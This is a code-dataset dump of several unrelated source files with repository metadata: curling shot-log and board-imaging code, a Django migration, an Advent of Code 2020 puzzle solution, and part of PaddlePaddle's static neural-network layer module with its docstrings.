bd = Board()
bd.locate_in_throw_point()
for i in range(nb): # black
while True:
pos = locate_in_play_area_p()
if not is_caving_in_bp(bd, pos): # ok
bd.stone[N_STONES - 1 - 2 * i] = pos
break
for i in range(nw): # white
while True:
pos = locate_in_play_area_p()
if not is_caving_in_bp(bd, pos): # ok
bd.stone[N_STONES - 2 - 2 * i] = pos
break
return bd
"""SHOTLOG_NORMAL_VARIABLE =(
('player', type(string)),
('opp_player', string),
('draw_game', int),
('random', float),
('end', int),
('turn', int),
('rel_score', int),
('score', int),
('rest_time', int),
('used_time', int))"""
SHOTLOG_NORMAL_VARIABLE =(
'player',
'opp_player',
'draw_game',
'random',
'end',
'turn',
'rscore',
'escore',
'rest_time',
'used_time')
def shotlog_to_string(sl):
lst = []
for var in SHOTLOG_NORMAL_VARIABLE:
lst.append(str(sl[var]))
cmv = sl['chosen_move']
rmv = sl['run_move']
for v in cmv:
lst.append(str(v))
for v in rmv:
lst.append(str(v))
prvs = sl['previous_stone']
afts = sl['after_stone']
for s in prvs:
for v in s:
lst.append(str(v))
for s in afts:
for v in s:
lst.append(str(v))
return ' '.join(lst);
def string_to_shot_log(str):
v = str.split(' ')
sl = {}
sl['player'] = v[0]
sl['opp_player'] = v[1]
sl['draw_game'] = int(v[2])
sl['random'] = float(v[3])
sl['end'] = int(v[4])
sl['turn'] = int(v[5])
sl['rscore'] = int(v[6])
sl['escore'] = int(v[7])
sl['rest_time'] = int(v[8])
sl['used_time'] = int(v[9])
sl['chosen_move'] = (float(v[10]), float(v[11]), int(v[12]))
sl['run_move'] = (float(v[13]), float(v[14]), int(v[15]))
p = np.empty(N_STONES, dtype = tuple)
a = np.empty(N_STONES, dtype = tuple)
for i in range(0, N_TURNS):
index = 16 + i * 2
x = float(v[index])
y = float(v[index + 1])
p[i] = (x, y)
for i in range(0, N_TURNS):
index = 16 + N_TURNS * 2 + i * 2
x = float(v[index])
y = float(v[index + 1])
a[i] = (x, y)
sl['previous_stone'] = p
sl['after_stone'] = a
return sl
def load_shot_log(file_path):
# read log
f = open(file_path)
logs = []
for line in f:
line = line.rstrip()
#print(line)
sl = string_to_shot_log(line)
logs.append(sl)
#print shotlog_to_string(sl)
return logs
def shot_log_to_board(sl):
bd = Board()
bd.end = sl['end']
bd.turn = sl['turn']
bd.rel_score = sl['rscore']
ps = sl['previous_stone']
for i in range(0, N_STONES):
bd.stone[i] = ps[N_STONES - 1 - i]
return bd
#IMAGE_WIDTH = 28
#IMAGE_LENGTH = 28
#IMAGE_PLAINS = 1
IMAGE_WIDTH = 27
IMAGE_LENGTH = 51
IMAGE_PLAINS = 5
IMAGE_SIZE = IMAGE_WIDTH * IMAGE_LENGTH
STEP_W_TO_X = PLAYAREA_WIDTH / (IMAGE_WIDTH - 1)
STEP_W_TO_Y = PLAYAREA_LENGTH / (IMAGE_LENGTH - 1)
def WtoX(w):
return X_PLAYAREA_MIN + w * STEP_W_TO_X
def LtoY(l):
return Y_PLAYAREA_MIN + l * STEP_W_TO_Y
NORM_SIGMA = STONE_RADIUS / 2
def norm(m, o):
return math.exp(-(((o[0] - m[0]) ** 2) + ((o[1] - m[1]) ** 2)) / (2 * (NORM_SIGMA ** 2))) / (math.sqrt(2 * math.pi) * NORM_SIGMA)
def board_to_image(bd):
img = np.zeros((IMAGE_WIDTH, IMAGE_LENGTH, IMAGE_PLAINS), dtype = float)
for w in range(IMAGE_WIDTH):
for l in range(IMAGE_LENGTH):
for p in range(IMAGE_PLAINS):
v = 0.0
m = (WtoX(w), LtoY(l))
# white
for i in range(WHITE, N_STONES, 2):
o = bd.stone[i]
if is_in_play_area(o):
v -= norm(m, o)
# black
for i in range(BLACK, N_STONES, 2):
o = bd.stone[i]
if is_in_play_area(o):
v += norm(m, o)
img[w][l][p] = v
return img
|
[
"a.a.b.a.b.c.a.b.c.d.abcd1234@gmail.com"
] |
a.a.b.a.b.c.a.b.c.d.abcd1234@gmail.com
|
c5fdfda86e2d27b77113ba406c7a91ed91ea85d5
|
bfa12b1960addbf4c026ae2f1e65c185363ba21e
|
/resident/migrations/0005_auto_20190417_0238.py
|
bd8d0f6f0a0c916e2a0f90ec3a98923e99a8c567
|
[
"MIT"
] |
permissive
|
vitorh45/residential
|
387aedc1f030caf210d3e2f41f0c60fae3000cb4
|
d36b29a72b9d1d79efab7e8549aec39eacce10d7
|
refs/heads/master
| 2022-12-08T13:57:00.579798
| 2019-06-07T04:20:13
| 2019-06-07T04:20:13
| 178,983,759
| 0
| 0
|
MIT
| 2022-11-22T03:51:05
| 2019-04-02T02:32:12
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 744
|
py
|
# Generated by Django 2.2 on 2019-04-17 02:38
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('resident', '0004_auto_20190414_0518'),
]
operations = [
migrations.RemoveField(
model_name='resident',
name='lot',
),
migrations.AddField(
model_name='resident',
name='log_number',
field=models.IntegerField(blank=True, null=True, verbose_name='Números do lote'),
),
migrations.AddField(
model_name='resident',
name='lot_block',
field=models.CharField(blank=True, max_length=20, null=True, verbose_name='Block do lote'),
),
]
|
[
"vitorh45@gmail.com"
] |
vitorh45@gmail.com
|
a004b9cdc6536c22f94e37b236230d27699337ff
|
266599ee7c19e7e38fce660010ec9e443e418d3b
|
/day15/day15.py
|
5c5916cfb3d9018c631566d2b0ef3ab674cbaf2d
|
[] |
no_license
|
Lisafiluz/Advent_of_code_2020
|
07c02d318903d1572fb4700278b154b67867e55c
|
cc86af482e0f50200a037b262c5225364633ab94
|
refs/heads/main
| 2023-02-06T17:36:27.151685
| 2020-12-18T10:26:44
| 2020-12-18T10:26:44
| 319,744,427
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,580
|
py
|
def get_file_data(path):
with open(path, 'r') as file_handler:
lines = file_handler.readlines()
lines_without_spaces = [line.strip() for line in lines]
return lines_without_spaces
def get_final_number(first_inp, turns):
game = {}
# Start of the game
inp = first_inp.split(',')
j = 1
for number in inp:
game[int(number)] = [j]
j += 1
# Starting play
current_number = int(inp[-1])
for i in range(len(inp) + 1, turns + 1):
if len(game[current_number]) == 1:
current_number = 0
if current_number in game:
if len(game[0]) == 1:
game[current_number].append(i)
else:
game[current_number][0] = game[current_number][1]
game[current_number][1] = i
else:
game[current_number] = [i]
else:
current_number = game[current_number][1] - game[current_number][0]
if current_number in game:
if len(game[current_number]) == 1:
game[current_number].append(i)
else:
game[current_number][0] = game[current_number][1]
game[current_number][1] = i
else:
game[current_number] = [i]
return current_number
if __name__ == "__main__":
path = "day15/input.txt"
file_data = get_file_data(path)
# part 1
print(get_final_number(file_data[0], 2020))
# part 2
print(get_final_number(file_data[0], 30000000))
|
[
"liluz@ebay.com"
] |
liluz@ebay.com
|
3f6698f81463d89c8041d67f7e261bbe1a62c573
|
5b59318f8a4908e9ca39665f9171dddc635f4b06
|
/python/paddle/static/nn/common.py
|
687e4545e305ba7dce97593f76430833e102b4fb
|
[
"Apache-2.0"
] |
permissive
|
chenwhql/Paddle
|
e85a6f9013e40601c11c214a323cf0d010283cd2
|
12473236a71e3b5c40a5b41f35fce5a115231a82
|
refs/heads/develop
| 2023-08-22T23:31:53.165184
| 2022-12-15T09:21:01
| 2022-12-15T09:21:01
| 137,726,910
| 0
| 2
|
Apache-2.0
| 2022-10-21T09:57:33
| 2018-06-18T08:24:29
|
C++
|
UTF-8
|
Python
| false
| false
| 123,422
|
py
|
# Copyright (c) 2022 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import inspect
import numpy as np
import paddle
from paddle.common_ops_import import (
LayerHelper,
check_type,
check_variable_and_dtype,
utils,
)
from paddle.fluid import core
from paddle.fluid.data_feeder import check_dtype
from paddle.fluid.framework import Variable, _non_static_mode, static_only
from paddle.fluid.initializer import Constant, Normal
from paddle.fluid.layers.layer_function_generator import templatedoc
from paddle.fluid.param_attr import ParamAttr
__all__ = []
@static_only
def fc(
x,
size,
num_flatten_dims=1,
weight_attr=None,
bias_attr=None,
activation=None,
name=None,
):
r"""
Fully-Connected layer can take a tensor or a list of tensor as its inputs.
It creates a 2-D weight tensor for each input tensor, which represents its
weight matrix from each input unit to each output unit. The fully connected
layer multiplies each input tensor with its corresponding weight to produce
an output tensor with shape :math:`[batch\_size, *, size]` , where :math:`*`
means any number of additional dimensions. If a list of tensor is given,
the results of multiple output tensors with shape :math:`[batch\_size, *, size]`
will be summed up. If :attr:`bias_attr` is not False, a 1-D bias tensor will
be created and added to the output. Finally, if :attr:`activation` is not None,
it will be applied to the output as well.
For a single input tensor :math:`X` , the equation is:
.. math::
Out = Act({XW + b})
For a list of input tensor, the equation is:
.. math::
Out = Act({\sum_{i=0}^{N-1}X_iW_i + b})
where:
* :math:`N`: The number of the input tensors. :math:`N` equals to :math:`len(X)` if :math:`X` is list of tensor.
* :math:`X_i`: The i-th input tensor.
* :math:`W_i`: The i-th weight matrix corresponding i-th input tensor.
* :math:`b`: The bias created by this layer (if needed).
* :math:`Act`: The activation function.
* :math:`Out`: The output tensor.
.. code-block:: text
# Case 1, input is a single tensor:
x.data = [[[0.1, 0.2],
[0.3, 0.4]]]
x.shape = (1, 2, 2) # 1 is batch_size
out = paddle.static.nn.fc(x=x, size=1, num_flatten_dims=2)
# Get the output:
out.data = [[0.83234344], [0.34936576]]
out.shape = (1, 2, 1)
# Case 2, input is a list of tensor:
x0.data = [[[0.1, 0.2],
[0.3, 0.4]]]
x0.shape = (1, 2, 2) # 1 is batch_size
x1.data = [[[0.1, 0.2, 0.3]]]
x1.shape = (1, 1, 3)
out = paddle.static.nn.fc(x=[x0, x1], size=2)
# Get the output:
out.data = [[0.18669507, 0.1893476]]
out.shape = (1, 2)
Args:
x (Tensor|list[Tensor]|tuple[Tensor]): A tensor or a list/tuple of tensors. The number of dimensions
of each tensor is at least 2. The data type should be float16, float32 or float64.
size (int): The number of output units in this layer, which also means the feature
size of output tensor.
num_flatten_dims (int, optional): The fc layer can accept an input tensor with more than
two dimensions. If this happens, the multi-dimensional tensor will first be flattened
into a 2-D matrix. The parameter :attr:`num_flatten_dims` determines how the input
tensor is flattened: the first :math:`num\_flatten\_dims` (inclusive, index starts from 1)
dimensions will be flatten to form the first dimension of the final matrix (height of
the matrix), and the rest :math:`rank(x) - num\_flatten\_dims` dimensions are
flattened to form the second dimension of the final matrix (width of the matrix).
For example, assuming that :attr:`x` is a 5-dimensional tensor with a shape
:math:`[2, 3, 4, 5, 6]` , and :attr:`num_flatten_dims` = 3.
Then, the flattened matrix will have a shape :math:`[2 * 3 * 4, 5 * 6] = [24, 30]` .
Default: 1.
weight_attr (ParamAttr, optional): The attribute for the learnable weight.
The default value is None, and the weight will be initialized to zero.
For detailed information, please refer to :attr:`paddle.ParamAttr`.
Warning, if x is a list of tensor, weight_attr should also be a list of same length.
bias_attr (ParamAttr|bool, optional): The attribute of the learnable bias.
If it is set to False, no bias will be added to the output.
If it is set to None or one kind of ParamAttr, a bias parameter will
be created according to ParamAttr. For detailed information, please refer
to :attr:`paddle.ParamAttr`. The default value is None and the bias will be
initialized to zero.
activation (str, optional): Activation to be applied to the output of
this layer, such as tanh, softmax, sigmoid, relu. For more information,
please refer to :ref:`api_guide_activations_en` . Default: None.
name (str, optional): The default value is None. Normally there is no need for user to set
it. For more information, please refer to :ref:`api_guide_Name` .
Returns:
Tensor, its shape is :math:`[batch\_size, *, size]` , and the data type is same with input.
Examples:
.. code-block:: python
import paddle
paddle.enable_static()
# When input is a single tensor
x = paddle.static.data(name="x", shape=[1, 2, 2], dtype="float32")
# x: [[[0.1 0.2]
# [0.3 0.4]]]
out = paddle.static.nn.fc(
x=x,
size=1,
num_flatten_dims=2,
weight_attr=paddle.ParamAttr(initializer=paddle.nn.initializer.Constant(value=0.5)),
bias_attr=paddle.ParamAttr(initializer=paddle.nn.initializer.Constant(value=1.0)))
# out: [[[1.15]
# [1.35]]]
# When input is multiple tensors
x0 = paddle.static.data(name="x0", shape=[1, 2, 2], dtype="float32")
# x0: [[[0.1 0.2]
# [0.3 0.4]]]
x1 = paddle.static.data(name="x1", shape=[1, 1, 3], dtype="float32")
# x1: [[[0.1 0.2 0.3]]]
out = paddle.static.nn.fc(
x=[x0, x1],
size=2,
weight_attr=paddle.ParamAttr(initializer=paddle.nn.initializer.Constant(value=0.5)),
bias_attr=paddle.ParamAttr(initializer=paddle.nn.initializer.Constant(value=1.0)))
# out: [[1.8 1.8]]
"""
return paddle.fluid.layers.fc(
input=x,
size=size,
num_flatten_dims=num_flatten_dims,
param_attr=weight_attr,
bias_attr=bias_attr,
act=activation,
name=name,
)
def instance_norm(
input, epsilon=1e-05, param_attr=None, bias_attr=None, name=None
):
r"""
:api_attr: Static Graph
**Instance Normalization Layer**
Can be used as a normalizer function for convolution or fully_connected operations.
The required data format for this layer is one of the following:
DataLayout: NCHW `[batch, in_channels, in_height, in_width]`
Refer to `Instance Normalization: The Missing Ingredient for
Fast Stylization <https://arxiv.org/pdf/1607.08022.pdf>`_
for more details.
:math:`input` is the input features over a mini-batch.
.. math::
\mu_{\beta} &\gets \frac{1}{HW} \sum_{i=1}^{HW} x_i \qquad &//
\ mean\ of\ one\ feature\ map\ in\ mini-batch \\
\sigma_{\beta}^{2} &\gets \frac{1}{HW} \sum_{i=1}^{HW}(x_i -
\mu_{\beta})^2 \qquad &//\ variance\ of\ one\ feature\ map\ in\ mini-batch \\
\hat{x_i} &\gets \frac{x_i - \mu_\beta} {\sqrt{
\sigma_{\beta}^{2} + \epsilon}} \qquad &//\ normalize \\
y_i &\gets \gamma \hat{x_i} + \beta \qquad &//\ scale\ and\ shift
Note:
`H` means height of feature map, `W` means width of feature map.
Args:
input(Tensor): The rank of input tensor can be 2, 3, 4, 5.
The data type is float32 or float64.
epsilon(float, Default 1e-05): A value added to the denominator for
numerical stability. Default is 1e-5.
param_attr(ParamAttr|None|bool, optional): The parameter attribute for Parameter `scale`
of instance_norm. If it is set to None or one attribute of ParamAttr, instance_norm
will create ParamAttr as param_attr, the name of scale can be set in ParamAttr.
If the Initializer of the param_attr is not set, the parameter is initialized
with Xavier. If the param_attr is set to False, instance_norm will not create param_attr.
Default: None.
bias_attr(ParamAttr|None|bool, optional): The parameter attribute for the bias of instance_norm.
If it is set to None or one attribute of ParamAttr, instance_norm
will create ParamAttr as bias_attr, the name of bias can be set in ParamAttr.
If the Initializer of the bias_attr is not set, the bias is initialized zero.
If the bias_attr is set to False, instance_norm will not create bias_attr.
Default: None.
name(string, Default None): A name for this layer(optional). If set None, the layer
will be named automatically.
Returns:
A Tensor which is the result after applying instance normalization on the input,
has same shape and data type with input.
Examples:
.. code-block:: python
import paddle
paddle.enable_static()
x = paddle.static.data(name='x', shape=[3, 7, 3, 7], dtype='float32')
hidden1 = paddle.static.nn.fc(x, size=200)
hidden2 = paddle.static.nn.instance_norm(hidden1)
"""
check_variable_and_dtype(
input, 'input', ['float32', 'float64'], 'instance_norm'
)
if param_attr is False:
assert (
bias_attr is False
), "param_attr and bias_attr must be set to False at the same time in instance_norm"
helper = LayerHelper('instance_norm', **locals())
dtype = helper.input_dtype()
# use fp32 for in parameter
if dtype == paddle.framework.core.VarDesc.VarType.FP16:
dtype = paddle.framework.core.VarDesc.VarType.FP32
input_shape = input.shape
if len(input.shape) < 2 or len(input.shape) > 5:
raise ValueError(
'expected 2D or 3D or 4D or 5D input (got {}D input, input shape is: {})'.format(
len(input.shape), input_shape
)
)
channel_num = input_shape[1]
param_shape = [channel_num]
if param_attr and bias_attr:
# create parameter
scale = helper.create_parameter(
attr=helper.param_attr,
shape=param_shape,
dtype=dtype,
default_initializer=Constant(1.0),
)
bias = helper.create_parameter(
attr=helper.bias_attr,
shape=param_shape,
dtype=dtype,
is_bias=True,
default_initializer=Constant(0.0),
)
# create output
saved_mean = helper.create_variable_for_type_inference(
dtype=dtype, stop_gradient=True
)
saved_variance = helper.create_variable_for_type_inference(
dtype=dtype, stop_gradient=True
)
instance_norm_out = helper.create_variable_for_type_inference(dtype)
inputs = {"X": input}
if param_attr and bias_attr:
inputs["Scale"] = scale
inputs["Bias"] = bias
helper.append_op(
type="instance_norm",
inputs=inputs,
outputs={
"Y": instance_norm_out,
"SavedMean": saved_mean,
"SavedVariance": saved_variance,
},
attrs={
"epsilon": epsilon,
},
)
return instance_norm_out
@static_only
def continuous_value_model(input, cvm, use_cvm=True):
r"""
**continuous_value_model layers**
Now, this OP is used in CTR project to remove or dispose show and click value in :attr:`input`.
:attr:`input` is an embedding vector including show and click value, whose shape is :math:`[N, D]` (N is batch size. D is `2 + embedding dim` ).
Show and click at first two dims of embedding vector D.
If :attr:`use_cvm` is True, it will calculate :math:`log(show)` and :math:`log(click)` , and output shape is :math:`[N, D]` .
If :attr:`use_cvm` is False, it will remove show and click from :attr:`input` , and output shape is :math:`[N, D - 2]` .
:attr:`cvm` is show_click info, whose shape is :math:`[N, 2]` .
Args:
input (Variable): The input variable. A 2-D LoDTensor with shape :math:`[N, D]` , where N is the batch size, D is `2 + the embedding dim` . `lod level = 1` .
A Tensor with type float32, float64.
cvm (Variable): Show and click variable. A 2-D Tensor with shape :math:`[N, 2]` , where N is the batch size, 2 is show and click.
A Tensor with type float32, float64.
use_cvm (bool): Use show_click or not. if use, the output dim is the same as input.
if not use, the output dim is `input dim - 2` (remove show and click)
Returns:
Variable: A 2-D LodTensor with shape :math:`[N, M]` . if :attr:`use_cvm` = True, M is equal to input dim D. if False, M is equal to `D - 2`. \
A Tensor with same type as input.
Examples:
.. code-block:: python
import paddle.fluid as fluid
import paddle
input = paddle.static.data(name="input", shape=[64, 1], dtype="int64")
label = paddle.static.data(name="label", shape=[64, 1], dtype="int64")
w0 = paddle.full(shape=(100, 1), fill_value=2).astype(paddle.float32)
embed = paddle.nn.functional.embedding(
input,
w0)
ones = paddle.full_like(label, 1, dtype="int64")
show_clk = paddle.cast(paddle.concat([ones, label], axis=1), dtype='float32')
show_clk.stop_gradient = True
input_with_cvm = paddle.static.nn.continuous_value_model(embed, show_clk, True)
"""
helper = LayerHelper('cvm', **locals())
out = helper.create_variable(dtype=input.dtype)
check_variable_and_dtype(
input, 'input', ['float16', 'float32', 'float64'], 'cvm'
)
helper.append_op(
type='cvm',
inputs={'X': [input], 'CVM': [cvm]},
outputs={'Y': [out]},
attrs={"use_cvm": use_cvm},
)
return out
@static_only
def data_norm(
input,
act=None,
epsilon=1e-05,
param_attr=None,
data_layout='NCHW',
in_place=False,
name=None,
moving_mean_name=None,
moving_variance_name=None,
do_model_average_for_mean_and_var=True,
slot_dim=-1,
sync_stats=False,
summary_decay_rate=0.9999999,
enable_scale_and_shift=False,
):
r"""
:api_attr: Static Graph
**Data Normalization Layer**
This op can be used as a normalizer function for conv2d and fully_connected operations.
The required data format for this layer is one of the following:
1. NHWC `[batch, in_height, in_width, in_channels]`
2. NCHW `[batch, in_channels, in_height, in_width]`
:math:`input` is the input features over a mini-batch.
.. math::
\mu_{\beta} &\gets \frac{1}{m} \sum_{i=1}^{m} x_i \qquad &//
\ mini-batch\ mean \\
\sigma_{\beta}^{2} &\gets \frac{1}{m} \sum_{i=1}^{m}(x_i -
\mu_{\beta})^2 \qquad &//\ mini-batch\ variance \\
\hat{x_i} &\gets \frac{x_i - \mu_\beta} {\sqrt{
\sigma_{\beta}^{2} + \epsilon}} \qquad &//\ normalize \\
y_i &\gets \gamma \hat{x_i} + \beta \qquad &//\ scale\ and\ shift
Args:
input (Tensor): The input Tensor.
act (str, optional): Activation type, linear|relu|prelu|... Default: None.
epsilon(float, optional): Whether to add small values into the variance during calculations
to prevent division by zero. Default: 1e-05.
param_attr (ParamAttr, optional): The parameter attribute for Parameter `scale`. Default: None.
data_layout (str, optional): Specify the data format of the input, and the data format of the output
will be consistent with that of the input. An optional string from: `"NCHW"`, `"NHWC"`.
The default is `"NCHW"`. When it is `"NCHW"`, the data is stored in the order of:
`[batch_size, input_channels, input_height, input_width]`. Default: `"NCHW"`.
in_place (bool, optional): Make the input and output of batch norm reuse memory. Default: False.
name (str, optional): A name for this layer (optional). If set None, the layer
will be named automatically. Default: None.
moving_mean_name (str, optional): The name of moving_mean which store the global Mean. Default: None.
moving_variance_name (str, optional): The name of the moving_variance which store the global Variance. Default: None.
do_model_average_for_mean_and_var (bool, optional): Whether parameter mean and variance
should do model average when model average is enabled. Default: True.
slot_dim (int, optional): The embedding dimension of one slot. Slot is a set of one specific feature. In pslib mode,
we distinguish feature ids by slot and pull their embeddings from parameter server (pslib). The first
place of the embedding is the historical show number (occurence time of this feature id with a label 0).
If the input of this op is concated by slot-wise embeddings, and the show number is zero when this slot
is new or empty, the normalization result may be impractical. To avoid this, we add slot_dim to locate
the show number and judge if the show number is zero. If so, we choose to skip normalization on this
embedding. Default: -1.
sync_stats (bool, optional): When running with multiple GPU cards, using allreduce to sync the
summary messages. Default: False.
summary_decay_rate (float, optional): The decay rate when updating summary. Default: 0.9999999.
enable_scale_and_shift (bool, optional): do scale&shift after normalization. Default: False.
Returns:
Tensor: A tensor which is the result after applying data normalization on the input.
Examples:
.. code-block:: python
import paddle
paddle.enable_static()
x = paddle.randn(shape=[32,100])
hidden2 = paddle.static.nn.data_norm(input=x)
"""
helper = LayerHelper('data_norm', **locals())
dtype = helper.input_dtype()
input_shape = input.shape
if data_layout == 'NCHW':
channel_num = input_shape[1]
else:
if data_layout == 'NHWC':
channel_num = input_shape[-1]
else:
raise ValueError("unsupported data layout:" + data_layout)
param_shape = [channel_num]
batch_size_default = 1e4
batch_sum_default = 0.0
batch_square_sum_default = 1e4
scale_w_default = 1.0
bias_default = 0.0
if param_attr and isinstance(param_attr, dict):
batch_size_default = param_attr.get("batch_size", 1e4)
batch_sum_default = param_attr.get("batch_sum", 0.0)
batch_square_sum_default = param_attr.get("batch_square", 1e4)
if enable_scale_and_shift:
scale_w_default = param_attr.get("scale_w", 1.0)
bias_default = param_attr.get("bias", 0.0)
# create scale and shift(bias) when enable_scale_and_shift is True
if name is None:
name = "dn"
if enable_scale_and_shift:
scale_w = helper.create_parameter(
attr=ParamAttr(
name=name + '.scale_w',
initializer=Constant(value=float(scale_w_default)),
trainable=True,
),
shape=param_shape,
dtype=input.dtype,
)
bias = helper.create_parameter(
attr=ParamAttr(
name=name + '.bias',
initializer=Constant(value=float(bias_default)),
trainable=True,
),
shape=param_shape,
dtype=input.dtype,
)
# create parameter
batch_size = helper.create_parameter(
attr=ParamAttr(
name=name + '.batch_size',
initializer=Constant(value=float(batch_size_default)),
trainable=True,
),
shape=param_shape,
dtype=input.dtype,
)
batch_sum = helper.create_parameter(
attr=ParamAttr(
name=name + '.batch_sum',
initializer=Constant(value=float(batch_sum_default)),
trainable=True,
),
shape=param_shape,
dtype=input.dtype,
)
batch_square_sum = helper.create_parameter(
attr=ParamAttr(
name=name + '.batch_square_sum',
initializer=Constant(value=float(batch_square_sum_default)),
trainable=True,
),
shape=param_shape,
dtype=input.dtype,
)
means = helper.create_variable(dtype=dtype, stop_gradient=True)
scales = helper.create_variable(dtype=dtype, stop_gradient=True)
data_norm_out = input if in_place else helper.create_variable(dtype=dtype)
inputs = {
"X": input,
"BatchSize": batch_size,
"BatchSum": batch_sum,
"BatchSquareSum": batch_square_sum,
}
attrs = {
"epsilon": epsilon,
"data_layout": data_layout,
"sync_stats": sync_stats,
"summary_decay_rate": summary_decay_rate,
}
if slot_dim > 0:
attrs["slot_dim"] = slot_dim
if enable_scale_and_shift:
attrs["enable_scale_and_shift"] = enable_scale_and_shift
if enable_scale_and_shift:
inputs["scale_w"] = scale_w
inputs["bias"] = bias
helper.append_op(
type="data_norm",
inputs=inputs,
outputs={
"Y": data_norm_out,
"Means": means,
"Scales": scales,
"BatchSize": batch_size,
"BatchSum": batch_sum,
"BatchSquareSum": batch_square_sum,
},
attrs=attrs,
)
return helper.append_activation(data_norm_out)
@templatedoc()
def group_norm(
input,
groups,
epsilon=1e-05,
param_attr=None,
bias_attr=None,
act=None,
data_layout='NCHW',
name=None,
):
"""
:api_attr: Static Graph
**Group Normalization Layer**
Refer to `Group Normalization <https://arxiv.org/abs/1803.08494>`_ .
Parameters:
input(Tensor): Tensor with dimension greater than 1, the data type is float32 or float64.
groups(int): The number of groups that divided from channels, the data type
is int32.
epsilon(float, optional): The small value added to the variance to prevent
division by zero, the data type is float32. Default: 1e-05.
param_attr(ParamAttr|bool, optional): ParamAttr object that specifies weight parameter
attribute. If a bool type, only False is supported, which means there is no weight parameter.
Default: None, the default weight parameter attribute is used. For more information, please
refer to :ref:`api_guide_ParamAttr` .
bias_attr(ParamAttr|bool, optional): ParamAttr object that specifies bias parameter
attribute. If a bool type, only False is supported, which means there is no bias parameter.
Default: None, the default bias parameter attribute is used. For more information, please
refer to :ref:`api_guide_ParamAttr` .
act(str, optional): Activation to be applied to the output of group normalization.
data_layout(str, optional): Specify the data format of the input, and the data format of the output
will be consistent with that of the input. An optional string from: `"NCHW"`, `"NHWC"`.
The default is `"NCHW"`. When it is `"NCHW"`, the data is stored in the order of:
`[batch_size, input_channels, *]`.
name (str, optional): The default value is None. Normally there is no need for user to set this
property. For more information, please refer to :ref:`api_guide_Name` .
Returns:
Tensor: A Tensor has same data type and data format with `input`.
Examples:
.. code-block:: python
import paddle
paddle.enable_static()
data = paddle.static.data(name='data', shape=[2, 8, 32, 32], dtype='float32')
x = paddle.static.nn.group_norm(input=data, groups=4)
print(x.shape) # [2, 8, 32, 32]
"""
helper = LayerHelper('group_norm', **locals())
dtype = helper.input_dtype()
check_variable_and_dtype(
input, 'input', ['float32', 'float64'], 'group_norm'
)
# create intput and parameters
inputs = {'X': input}
input_shape = input.shape
if len(input_shape) < 2:
raise ValueError(
f"The dimensions of Op(static.nn.group_norm)'s input should be more than 1. But received {len(input_shape)}"
)
if data_layout != 'NCHW' and data_layout != 'NHWC':
raise ValueError(
"Param(data_layout) of Op(static.nn.group_norm) got wrong value: received "
+ data_layout
+ " but only NCHW or NHWC supported."
)
channel_num = input_shape[1] if data_layout == 'NCHW' else input_shape[-1]
param_shape = [channel_num]
if param_attr:
scale = helper.create_parameter(
attr=helper.param_attr,
shape=param_shape,
dtype=dtype,
default_initializer=Constant(1.0),
)
inputs['Scale'] = scale
if bias_attr:
bias = helper.create_parameter(
attr=helper.bias_attr, shape=param_shape, dtype=dtype, is_bias=True
)
inputs['Bias'] = bias
# create output
mean_out = helper.create_variable(dtype=dtype, stop_gradient=True)
variance_out = helper.create_variable(dtype=dtype, stop_gradient=True)
group_norm_out = helper.create_variable(dtype=dtype)
helper.append_op(
type="group_norm",
inputs=inputs,
outputs={
"Y": group_norm_out,
"Mean": mean_out,
"Variance": variance_out,
},
attrs={
"epsilon": epsilon,
"groups": groups,
"data_layout": data_layout,
},
)
return helper.append_activation(group_norm_out)
def conv3d(
input,
num_filters,
filter_size,
stride=1,
padding=0,
dilation=1,
groups=None,
param_attr=None,
bias_attr=None,
use_cudnn=True,
act=None,
name=None,
data_format="NCDHW",
):
r"""
:api_attr: Static Graph
The convolution3D layer calculates the output based on the input, filter
and strides, paddings, dilations, groups parameters. Input(Input) and
Output(Output) are in NCDHW or NDHWC format. Where N is batch size C is the number of
channels, D is the depth of the feature, H is the height of the feature,
and W is the width of the feature. Convlution3D is similar with Convlution2D
but adds one dimension(depth). If bias attribution and activation type are
provided, bias is added to the output of the convolution, and the
corresponding activation function is applied to the final result.
For each input :math:`X`, the equation is:
.. math::
Out = \sigma (W \ast X + b)
In the above equation:
* :math:`X`: Input value, a tensor with NCDHW or NDHWC format.
* :math:`W`: Filter value, a tensor with MCDHW format.
* :math:`\ast`: Convolution operation.
* :math:`b`: Bias value, a 2-D tensor with shape [M, 1].
* :math:`\sigma`: Activation function.
* :math:`Out`: Output value, the shape of :math:`Out` and :math:`X` may be different.
Example:
- Input:
Input shape: :math:`(N, C_{in}, D_{in}, H_{in}, W_{in})`
Filter shape: :math:`(C_{out}, C_{in}, D_f, H_f, W_f)`
- Output:
Output shape: :math:`(N, C_{out}, D_{out}, H_{out}, W_{out})`
Where
.. math::
D_{out}&= \frac{(D_{in} + 2 * paddings[0] - (dilations[0] * (D_f - 1) + 1))}{strides[0]} + 1 \\
H_{out}&= \frac{(H_{in} + 2 * paddings[1] - (dilations[1] * (H_f - 1) + 1))}{strides[1]} + 1 \\
W_{out}&= \frac{(W_{in} + 2 * paddings[2] - (dilations[2] * (W_f - 1) + 1))}{strides[2]} + 1
Args:
input (Tensor): The input is 5-D Tensor with shape [N, C, D, H, W], the data
type of input is float16 or float32 or float64.
num_filters(int): The number of filter. It is as same as the output
image channel.
filter_size (int|tuple): The filter size. If filter_size is a tuple,
it must contain three integers, (filter_size_depth, filter_size_height,
filter_size_width). Otherwise, filter_size_depth = filter_size_height = \
filter_size_width = filter_size.
stride (int|tuple): The stride size. It means the stride in convolution. If stride is a
tuple, it must contain three integers, (stride_depth, stride_height, stride_width).
Otherwise, stride_depth = stride_height = stride_width = stride. Default: stride = 1.
padding (string|int|list|tuple): The padding size. It means the number of zero-paddings
on both sides for each dimension. If `padding` is a string, either 'VALID' or
'SAME' which is the padding algorithm. If padding size is a tuple or list,
it could be in three forms: `[pad_depth, pad_height, pad_width]` or
`[pad_depth_front, pad_depth_back, pad_height_top, pad_height_bottom, pad_width_left, pad_width_right]`,
and when `data_format` is `"NCDHW"`, `pool_padding` can be in the form
